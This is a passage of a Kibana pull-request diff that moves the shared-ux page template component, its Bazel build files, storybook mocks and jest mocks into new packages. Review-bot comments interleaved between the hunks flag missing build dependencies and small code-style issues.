+) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) 
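Review bot: RUNTIME_DEPS lists only `@npm//react` and `//packages/shared-ux/page/no_data_config/impl`, but the sources moved into this package import `classnames`, `@elastic/eui` and `@kbn/shared-ux-page-solution-nav` (see the page_template_inner.tsx hunk later in this diff), and TYPES_DEPS has no corresponding entries either. Unless those are guaranteed to arrive transitively, the package builds against whatever happens to be resolvable; following the `@npm//name-of-package` convention in the comment above, add `"@npm//classnames",` and `"@npm//@elastic/eui",` plus the solution-nav package target to RUNTIME_DEPS, and their types targets to TYPES_DEPS.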
diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template.mdx b/packages/shared-ux/page/kibana_template/impl/README.mdx similarity index 97% rename from packages/kbn-shared-ux-components/src/page_template/page_template.mdx rename to packages/shared-ux/page/kibana_template/impl/README.mdx index fbaada158e277..6d8151cbe882c 100644 --- a/packages/kbn-shared-ux-components/src/page_template/page_template.mdx +++ b/packages/shared-ux/page/kibana_template/impl/README.mdx @@ -1,6 +1,6 @@ --- id: sharedUX/Components/PageTemplate -slug: /shared-ux-components/page_template/page_template +slug: /shared-ux/page_template title: Page Template description: A Kibana-specific wrapper around `EuiTemplate` tags: ['shared-ux', 'component'] @@ -124,7 +124,7 @@ Increases the consistency in messaging across all the solutions during the getti This is a built-in configuration that displays a very specific UI and requires very specific keys. It will also ignore all other configurations of the template including `pageHeader` and `children`, with the exception of continuing to show `solutionNav`. -The `noDataConfig` is of type [`NoDataPageProps`](https://github.com/elastic/kibana/blob/main/packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts#L14): +The `noDataConfig` is of type [`NoDataPageProps`](https://github.com/elastic/kibana/blob/main/packages/shared-ux/page/no_data/types/index.d.ts): 1. `solution: string`: Single name for the current solution, used to auto-generate the title, logo, and description *(required)* 2. `docsLink: string`: Required to set the docs link for the whole solution *(required)* diff --git a/packages/shared-ux/card/no_data/mocks/jest.config.js b/packages/shared-ux/page/kibana_template/impl/jest.config.js similarity index 81% rename from packages/shared-ux/card/no_data/mocks/jest.config.js rename to packages/shared-ux/page/kibana_template/impl/jest.config.js index 2c7697ab74eb8..103defe0f0ca6 100644 
--- a/packages/shared-ux/card/no_data/mocks/jest.config.js +++ b/packages/shared-ux/page/kibana_template/impl/jest.config.js @@ -7,7 +7,7 @@ */ module.exports = { - preset: '@kbn/test/jest_node', + preset: '@kbn/test', rootDir: '../../../../..', - roots: ['/packages/shared-ux/card/no_data/mocks'], + roots: ['/packages/shared-ux/page/kibana_template/impl'], }; diff --git a/packages/shared-ux/page/kibana_template/impl/package.json b/packages/shared-ux/page/kibana_template/impl/package.json new file mode 100644 index 0000000000000..a089481047999 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/package.json @@ -0,0 +1,7 @@ +{ + "name": "@kbn/shared-ux-page-kibana-template", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} \ No newline at end of file diff --git a/packages/kbn-shared-ux-components/src/page_template/__snapshots__/page_template.test.tsx.snap b/packages/shared-ux/page/kibana_template/impl/src/__snapshots__/page_template.test.tsx.snap similarity index 100% rename from packages/kbn-shared-ux-components/src/page_template/__snapshots__/page_template.test.tsx.snap rename to packages/shared-ux/page/kibana_template/impl/src/__snapshots__/page_template.test.tsx.snap diff --git a/packages/kbn-shared-ux-components/src/page_template/__snapshots__/page_template_inner.test.tsx.snap b/packages/shared-ux/page/kibana_template/impl/src/__snapshots__/page_template_inner.test.tsx.snap similarity index 100% rename from packages/kbn-shared-ux-components/src/page_template/__snapshots__/page_template_inner.test.tsx.snap rename to packages/shared-ux/page/kibana_template/impl/src/__snapshots__/page_template_inner.test.tsx.snap 
diff --git a/packages/kbn-shared-ux-components/src/page_template/index.ts b/packages/shared-ux/page/kibana_template/impl/src/index.ts similarity index 60% rename from packages/kbn-shared-ux-components/src/page_template/index.ts rename to packages/shared-ux/page/kibana_template/impl/src/index.ts index cd7d6232d9a8b..9a890cafe49aa 100644 --- a/packages/kbn-shared-ux-components/src/page_template/index.ts +++ b/packages/shared-ux/page/kibana_template/impl/src/index.ts @@ -5,7 +5,12 @@ * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ -export { NoDataPage, NoDataConfigPage } from './no_data_page'; + export { KibanaPageTemplate } from './page_template'; -export type { KibanaPageTemplateProps } from './types'; -export type { NoDataPageProps } from './no_data_page'; +export { KibanaPageTemplateProvider, KibanaPageTemplateKibanaProvider } from './services'; +export type { + NoDataConfig, + KibanaPageTemplateProps, + KibanaPageTemplateServices, + KibanaPageTemplateKibanaDependencies, +} from '@kbn/shared-ux-page-kibana-template-types'; diff --git a/packages/shared-ux/page/kibana_template/impl/src/page_template.stories.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template.stories.tsx new file mode 100644 index 0000000000000..91f46f4f89faa --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/src/page_template.stories.tsx 
@@ -0,0 +1,82 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; +import { + KibanaPageTemplateStorybookMock, + NoDataConfigStorybookMock, + SolutionNavStorybookMock, + InnerPageTemplateStorybookMock, +} from '@kbn/shared-ux-page-kibana-template-mocks'; +import type { + KibanaPageTemplateStorybookParams, + NoDataConfigStorybookParams, + SolutionNavStorybookParams, + InnerPageTemplateStorybookParams, +} from '@kbn/shared-ux-page-kibana-template-mocks'; + +import { KibanaPageTemplateProvider } from './services'; + +import { KibanaPageTemplate as Component } from './page_template'; +import mdx from '../README.mdx'; + +export default { + title: 'Page/Page Template', + description: + 'A thin wrapper around `EuiTemplate`. 
Takes care of styling, empty state and no data config', + parameters: { + docs: { + page: mdx, + }, + }, +}; + +const templateMock = new KibanaPageTemplateStorybookMock(); +const solutionNavMock = new SolutionNavStorybookMock(); +const noDataConfigMock = new NoDataConfigStorybookMock(); +const innerMock = new InnerPageTemplateStorybookMock(); + +export const WithNoDataConfig = (params: NoDataConfigStorybookParams) => { + return ( + + + + ); +}; + +WithNoDataConfig.argTypes = noDataConfigMock.getArgumentTypes(); + +export const WithSolutionNav = (params: SolutionNavStorybookParams) => { + return ( + + + + ); +}; + +WithSolutionNav.argTypes = solutionNavMock.getArgumentTypes(); + +export const WithBoth = (params: KibanaPageTemplateStorybookParams) => { + return ( + + + + ); +}; + +WithBoth.argTypes = templateMock.getArgumentTypes(); + +export const WithNeither = (params: InnerPageTemplateStorybookParams) => { + return ( + + + + ); +}; + +WithNeither.argTypes = innerMock.getArgumentTypes(); diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template.test.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template.test.tsx similarity index 97% rename from packages/kbn-shared-ux-components/src/page_template/page_template.test.tsx rename to packages/shared-ux/page/kibana_template/impl/src/page_template.test.tsx index 1324b60b92870..0e9df4b6c2394 100644 --- a/packages/kbn-shared-ux-components/src/page_template/page_template.test.tsx +++ b/packages/shared-ux/page/kibana_template/impl/src/page_template.test.tsx @@ -9,9 +9,9 @@ import React from 'react'; import { shallow, render } from 'enzyme'; import { SolutionNavProps } from '@kbn/shared-ux-page-solution-nav'; +import type { NoDataPageProps } from '@kbn/shared-ux-page-no-data-types'; import { KibanaPageTemplate } from './page_template'; -import { NoDataPageProps } from './no_data_page'; const items: SolutionNavProps['items'] = [ { 
diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template.tsx similarity index 82% rename from packages/kbn-shared-ux-components/src/page_template/page_template.tsx rename to packages/shared-ux/page/kibana_template/impl/src/page_template.tsx index 467f02224b0de..5a05315d395a7 100644 --- a/packages/kbn-shared-ux-components/src/page_template/page_template.tsx +++ b/packages/shared-ux/page/kibana_template/impl/src/page_template.tsx @@ -6,13 +6,17 @@ * Side Public License, v 1. */ -import React, { FunctionComponent } from 'react'; +import React, { FC } from 'react'; + +import { + NoDataConfigPage, + NoDataConfigPageWithSolutionNavBar, +} from '@kbn/shared-ux-page-no-data-config'; +import { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template-types'; -import { NoDataConfigPage, NoDataConfigPageWithSolutionNavBar } from './no_data_page'; import { KibanaPageTemplateInner, KibanaPageTemplateWithSolutionNav } from './page_template_inner'; -import { KibanaPageTemplateProps } from './types'; -export const KibanaPageTemplate: FunctionComponent = ({ +export const KibanaPageTemplate: FC = ({ template, className, children, diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template_inner.test.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template_inner.test.tsx similarity index 100% rename from packages/kbn-shared-ux-components/src/page_template/page_template_inner.test.tsx rename to packages/shared-ux/page/kibana_template/impl/src/page_template_inner.test.tsx 
diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template_inner.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template_inner.tsx similarity index 81% rename from packages/kbn-shared-ux-components/src/page_template/page_template_inner.tsx rename to packages/shared-ux/page/kibana_template/impl/src/page_template_inner.tsx index 46424348f2ff3..6d836a3c66d7f 100644 --- a/packages/kbn-shared-ux-components/src/page_template/page_template_inner.tsx +++ b/packages/shared-ux/page/kibana_template/impl/src/page_template_inner.tsx @@ -6,20 +6,25 @@ * Side Public License, v 1. */ -import React, { FunctionComponent } from 'react'; - +import React, { FC } from 'react'; +import classNames from 'classnames'; import { EuiEmptyPrompt, EuiPageTemplate } from '@elastic/eui'; -import { withSolutionNav } from '@kbn/shared-ux-page-solution-nav'; -import { KibanaPageTemplateProps } from './types'; -import { getClasses } from './util'; +import { withSolutionNav } from '@kbn/shared-ux-page-solution-nav'; +import { KibanaPageTemplateProps as Props } from '@kbn/shared-ux-page-kibana-template-types'; -type Props = KibanaPageTemplateProps; +const getClasses = (template?: string, className?: string) => { + return classNames( + 'kbnPageTemplate', + template ? { [`kbnPageTemplate--${template}`]: template } : '', + className || '' + ); +}; /** * A thin wrapper around EuiPageTemplate with a few Kibana specific additions */ -export const KibanaPageTemplateInner: FunctionComponent = ({ +export const KibanaPageTemplateInner: FC = ({ template, className, pageHeader, diff --git a/packages/shared-ux/page/kibana_template/impl/src/services.tsx b/packages/shared-ux/page/kibana_template/impl/src/services.tsx new file mode 100644 index 0000000000000..328d3e8a6f9c8 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/src/services.tsx 
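Review bot: `getClasses` hands `classnames` an object whose value is the `template` string and a `className || ''` fallback, both of which `classnames` already handles by dropping falsy entries; `return classNames('kbnPageTemplate', template && 'kbnPageTemplate--' + template, className);` is equivalent and shorter. Since the helper is now module-local instead of imported from `./util`, a one-line comment such as `// Builds the modifier class for the requested template variant plus any caller class` would help the next reader. The `KibanaPageTemplateInner` signature continues past the hunk.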
@@ -0,0 +1,41 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React, { FC } from 'react'; + +import { + NoDataConfigPageProvider, + NoDataConfigPageKibanaProvider, +} from '@kbn/shared-ux-page-no-data-config'; + +import { + KibanaPageTemplateServices, + KibanaPageTemplateKibanaDependencies, +} from '@kbn/shared-ux-page-kibana-template-types'; + +/** + * A Context Provider that provides services to the component and its dependencies. + */ +export const KibanaPageTemplateProvider: FC = ({ + children, + ...services +}) => { + return {children}; +}; + +/** + * Kibana-specific Provider that maps dependencies to services. + */ +export const KibanaPageTemplateKibanaProvider: FC = ({ + children, + ...dependencies +}) => { + return ( + {children} + ); +}; diff --git a/packages/shared-ux/page/kibana_template/impl/tsconfig.json b/packages/shared-ux/page/kibana_template/impl/tsconfig.json new file mode 100644 index 0000000000000..6b965878dca79 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/tsconfig.json @@ -0,0 +1,19 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": ".", + "stripInternal": false, + "types": [ + "jest", + "node", + "@kbn/ambient-ui-types", + ] + }, + "include": [ + "src/**/*" + ] +} diff --git a/packages/shared-ux/page/kibana_template/mocks/BUILD.bazel b/packages/shared-ux/page/kibana_template/mocks/BUILD.bazel new file mode 100644 index 0000000000000..0680dd91e867f --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/BUILD.bazel 
@@ -0,0 +1,144 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "mocks" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-kibana-template-mocks" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + "src/**/*.tsx", + ], + exclude = [ + "**/*.config.js", + "**/*.mock.*", + "**/*.test.*", + "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//lodash", + "@npm//react", + "//packages/shared-ux/page/no_data_config/mocks", + "//packages/shared-ux/storybook/mock", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. 
"//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/jest", + "@npm//@types/lodash", + "@npm//@types/node", + "@npm//@types/react", + "//packages/shared-ux/page/kibana_template/types", + "//packages/shared-ux/page/no_data_config/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/kibana_template/mocks/README.mdx b/packages/shared-ux/page/kibana_template/mocks/README.mdx new file mode 100644 index 0000000000000..7515ff010ac90 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/README.mdx 
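Review bot: `src/jest.ts` of this package (further down in the diff) imports `@kbn/shared-ux-card-no-data-mocks`, but RUNTIME_DEPS here lists only lodash, react, `no_data_config/mocks` and `storybook/mock`, and TYPES_DEPS has no card mocks entry; add `"//packages/shared-ux/card/no_data/mocks",` and `"//packages/shared-ux/card/no_data/mocks:npm_module_types",` (the labels the kibana_no_data mocks BUILD above uses) unless the dependency is meant to come transitively. Separately, the `exclude` list contains `"**/storybook"` while this package keeps its storybook mocks under `src/storybook/`; as a glob exclude that pattern should match only a file literally named storybook rather than the directory's contents, but a short comment next to it would prevent a reader from assuming those sources are dropped.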
@@ -0,0 +1,3 @@
+# @kbn/shared-ux-page-kibana-template-mocks
+
+Empty package generated by @kbn/generate
diff --git a/packages/shared-ux/page/kibana_template/mocks/package.json b/packages/shared-ux/page/kibana_template/mocks/package.json
new file mode 100644
index 0000000000000..c6dc7b5671d7e
--- /dev/null
+++ b/packages/shared-ux/page/kibana_template/mocks/package.json
@@ -0,0 +1,8 @@
+{
+ "name": "@kbn/shared-ux-page-kibana-template-mocks",
+ "private": true,
+ "version": "1.0.0",
+ "main": "./target_node/index.js",
+ "browser": "./target_web/index.js",
+ "license": "SSPL-1.0 OR Elastic License 2.0"
+}
\ No newline at end of file
diff --git a/packages/shared-ux/page/kibana_template/mocks/src/index.ts b/packages/shared-ux/page/kibana_template/mocks/src/index.ts
new file mode 100644
index 0000000000000..c2193c9c89e61
--- /dev/null
+++ b/packages/shared-ux/page/kibana_template/mocks/src/index.ts
@@ -0,0 +1,26 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0 and the Server Side Public License, v 1; you may not use this file except
+ * in compliance with, at your election, the Elastic License 2.0 or the Server
+ * Side Public License, v 1.
+ */
+
+export {
+ getServicesMock as getKibanaPageTemplateServicesMock,
+ getKibanaDependenciesMock as getKibanaPageTemplateKibanaDependenciesMock,
+} from './jest';
+
+export {
+ KibanaPageTemplateStorybookMock,
+ NoDataConfigStorybookMock,
+ SolutionNavStorybookMock,
+ InnerPageTemplateStorybookMock,
+} from './storybook';
+
+export type {
+ KibanaPageTemplateStorybookParams,
+ NoDataConfigStorybookParams,
+ SolutionNavStorybookParams,
+ InnerPageTemplateStorybookParams,
+} from './storybook';
diff --git a/packages/shared-ux/page/kibana_template/mocks/src/jest.ts b/packages/shared-ux/page/kibana_template/mocks/src/jest.ts
new file mode 100644
index 0000000000000..5f260e194f6d8
--- /dev/null
+++ b/packages/shared-ux/page/kibana_template/mocks/src/jest.ts
@@ -0,0 +1,30 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0 and the Server Side Public License, v 1; you may not use this file except
+ * in compliance with, at your election, the Elastic License 2.0 or the Server
+ * Side Public License, v 1.
+ */
+
+import { getNoDataCardKibanaDependenciesMock } from '@kbn/shared-ux-card-no-data-mocks';
+import type {
+ KibanaPageTemplateServices,
+ KibanaPageTemplateKibanaDependencies,
+} from '@kbn/shared-ux-page-kibana-template-types';
+import { getNoDataConfigPageServicesMock } from '@kbn/shared-ux-page-no-data-config-mocks';
+
+export const getServicesMock = () => {
+ const services: KibanaPageTemplateServices = {
+ ...getNoDataConfigPageServicesMock(),
+ };
+
+ return services;
+};
+
+export const getKibanaDependenciesMock = () => {
+ const dependencies: KibanaPageTemplateKibanaDependencies = {
+ ...getNoDataCardKibanaDependenciesMock(),
+ };
+
+ return dependencies;
+};
diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/all.ts b/packages/shared-ux/page/kibana_template/mocks/src/storybook/all.ts
new file mode 100644
index 0000000000000..6a5754ba1862b
--- /dev/null
+++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/all.ts
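Review bot: `getKibanaDependenciesMock` is typed as `KibanaPageTemplateKibanaDependencies`, which the types package in this same PR aliases to `NoDataConfigPageKibanaDependencies`, but it is populated from the card-level `getNoDataCardKibanaDependenciesMock()` while `getServicesMock` directly above uses the page-level `getNoDataConfigPageServicesMock()`. This compiles only as long as the page-level dependencies add nothing beyond the card's, and a future addition would surface here as a confusing type error rather than at its origin. If `@kbn/shared-ux-page-no-data-config-mocks` exports a Kibana-dependencies mock, prefer it for symmetry; otherwise add `// NoDataConfigPage currently needs no Kibana dependencies beyond NoDataCard's, so the card mock is sufficient` above the spread.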
@@ -0,0 +1,72 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import type { + KibanaPageTemplateProps, + KibanaPageTemplateServices, +} from '@kbn/shared-ux-page-kibana-template-types'; + +import { noDataConfigArguments } from './no_data_config'; +import type { NoDataConfigArguments } from './no_data_config'; +import { solutionNavArguments, solutionNavProps } from './solution_nav'; +import type { SolutionNavArguments } from './solution_nav'; + +type PropArguments = NoDataConfigArguments & SolutionNavArguments; + +export type Params = ArgumentParams & NoDataConfigPageStorybookParams; + +const noDataConfigMock = new NoDataConfigPageStorybookMock(); + +export class StorybookMock extends AbstractStorybookMock< + KibanaPageTemplateProps, + KibanaPageTemplateServices, + PropArguments +> { + propArguments = { + ...noDataConfigArguments, + ...solutionNavArguments, + }; + + serviceArguments = {}; + + dependencies = [noDataConfigMock]; + + getProps(params?: Params): KibanaPageTemplateProps { + const result: KibanaPageTemplateProps = { + noDataConfig: { + action: { + elasticAgent: { + title: 'Add Integrations', + }, + }, + solution: this.getArgumentValue('solution', params), + logo: this.getArgumentValue('logo', params), + docsLink: this.getArgumentValue('docsLink', params), + pageTitle: this.getArgumentValue('pageTitle', params), + 
}, + solutionNav: { + name: this.getArgumentValue('name', params), + icon: this.getArgumentValue('icon', params), + canBeCollapsed: this.getArgumentValue('canBeCollapsed', params), + ...solutionNavProps, + }, + }; + + return result; + } + + getServices(params: Params): KibanaPageTemplateServices { + return { ...noDataConfigMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/index.ts b/packages/shared-ux/page/kibana_template/mocks/src/storybook/index.ts new file mode 100644 index 0000000000000..ecbc26c20a095 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/index.ts @@ -0,0 +1,19 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +export { StorybookMock as NoDataConfigStorybookMock } from './no_data_config'; +export type { Params as NoDataConfigStorybookParams } from './no_data_config'; + +export { StorybookMock as SolutionNavStorybookMock } from './solution_nav'; +export type { Params as SolutionNavStorybookParams } from './solution_nav'; + +export { StorybookMock as KibanaPageTemplateStorybookMock } from './all'; +export type { Params as KibanaPageTemplateStorybookParams } from './all'; + +export { StorybookMock as InnerPageTemplateStorybookMock } from './inner'; +export type { Params as InnerPageTemplateStorybookParams } from './inner'; diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/inner.tsx b/packages/shared-ux/page/kibana_template/mocks/src/storybook/inner.tsx new file mode 100644 index 0000000000000..7794aea021b89 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/inner.tsx 
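Review bot: `getProps(params?: Params)` accepts an omitted argument while `getServices(params: Params)` right below requires one, although `getProps` already forwards the optional `params` to `getArgumentValue` without trouble; the same asymmetry is repeated in `inner.tsx`, `no_data_config.ts` and `solution_nav.ts`. If the base class and `noDataConfigMock.getServices` permit it, make them agree with `getServices(params?: Params): KibanaPageTemplateServices {`; if the required form comes from `AbstractStorybookMock`, a short comment saying so would stop the next reader from "fixing" it. As a matter of style the `result` local can be returned inline, since the declared return type already provides the excess-property check.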
@@ -0,0 +1,94 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import type { + KibanaPageTemplateProps, + KibanaPageTemplateServices, +} from '@kbn/shared-ux-page-kibana-template-types'; + +type PageHeader = NonNullable; +export type PageHeaderArguments = Pick< + PageHeader, + 'iconType' | 'pageTitle' | 'description' | 'rightSideItems' +>; + +type PropArguments = Pick & PageHeaderArguments; + +export type Params = ArgumentParams & NoDataConfigPageStorybookParams; + +const noDataConfigMock = new NoDataConfigPageStorybookMock(); + +export const pageHeaderArguments: ArgumentParams = { + isEmptyState: { + control: 'boolean', + defaultValue: false, + }, + iconType: { + control: { type: 'radio' }, + options: ['logoElastic', 'logoKibana', 'logoCloud', undefined], + defaultValue: undefined, + }, + pageTitle: { + control: 'text', + defaultValue: 'Page title', + }, + description: { + control: 'text', + defaultValue: 'Page description', + }, + rightSideItems: { + control: 'boolean', + defaultValue: true, + }, +}; + +const rightSideItems: PageHeaderArguments['rightSideItems'] = [ + First Item, + Second Item, +]; + +export class StorybookMock extends AbstractStorybookMock< + KibanaPageTemplateProps, + KibanaPageTemplateServices, + PropArguments +> { + propArguments = { + ...pageHeaderArguments, + }; + + 
serviceArguments = {}; + + dependencies = []; + + getProps(params?: Params): KibanaPageTemplateProps { + const result: KibanaPageTemplateProps = { + isEmptyState: this.getArgumentValue('isEmptyState', params), + pageHeader: { + iconType: this.getArgumentValue('iconType', params), + pageTitle: this.getArgumentValue('pageTitle', params), + description: this.getArgumentValue('description', params), + rightSideItems: this.getArgumentValue('rightSideItems', params) + ? rightSideItems + : undefined, + }, + }; + + return result; + } + + getServices(params: Params): KibanaPageTemplateServices { + return { ...noDataConfigMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/no_data_config.ts b/packages/shared-ux/page/kibana_template/mocks/src/storybook/no_data_config.ts new file mode 100644 index 0000000000000..92e7f0da52e62 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/no_data_config.ts 
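Review bot: `dependencies = []` in `inner.tsx`, while `getServices` still delegates to `noDataConfigMock.getServices(params)` and `Params` includes `NoDataConfigPageStorybookParams`; the sibling mocks in `all.ts`, `no_data_config.ts` and `solution_nav.ts` list `dependencies = [noDataConfigMock]` for exactly the same delegation. If `AbstractStorybookMock` uses `dependencies` to collect argument types (inferred — the base class is not in this diff), the Inner story will render without the no-data-config controls that its services consume. Either use `dependencies = [noDataConfigMock];` for consistency or add a comment stating why the inner template deliberately exposes none.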
@@ -0,0 +1,86 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import type { + NoDataConfig, + KibanaPageTemplateProps, + KibanaPageTemplateServices, +} from '@kbn/shared-ux-page-kibana-template-types'; + +export type NoDataConfigArguments = Pick< + NoDataConfig, + 'solution' | 'logo' | 'docsLink' | 'pageTitle' +>; + +type PropArguments = NoDataConfigArguments; + +export type Params = ArgumentParams & NoDataConfigPageStorybookParams; + +const noDataConfigMock = new NoDataConfigPageStorybookMock(); + +export const noDataConfigArguments: ArgumentParams = { + solution: { + control: 'text', + defaultValue: 'Observability', + }, + logo: { + control: { type: 'radio' }, + options: ['logoElastic', 'logoKibana', 'logoCloud', undefined], + defaultValue: undefined, + }, + docsLink: { + control: 'text', + defaultValue: 'docs/link', + }, + pageTitle: { + control: 'text', + defaultValue: '', + }, +}; + +export class StorybookMock extends AbstractStorybookMock< + KibanaPageTemplateProps, + KibanaPageTemplateServices, + PropArguments +> { + propArguments = { + ...noDataConfigArguments, + }; + + serviceArguments = {}; + + dependencies = [noDataConfigMock]; + + getProps(params?: Params): KibanaPageTemplateProps { + const result: KibanaPageTemplateProps = { + noDataConfig: { + action: { + elasticAgent: { + title: 'Add Integrations', + }, + }, 
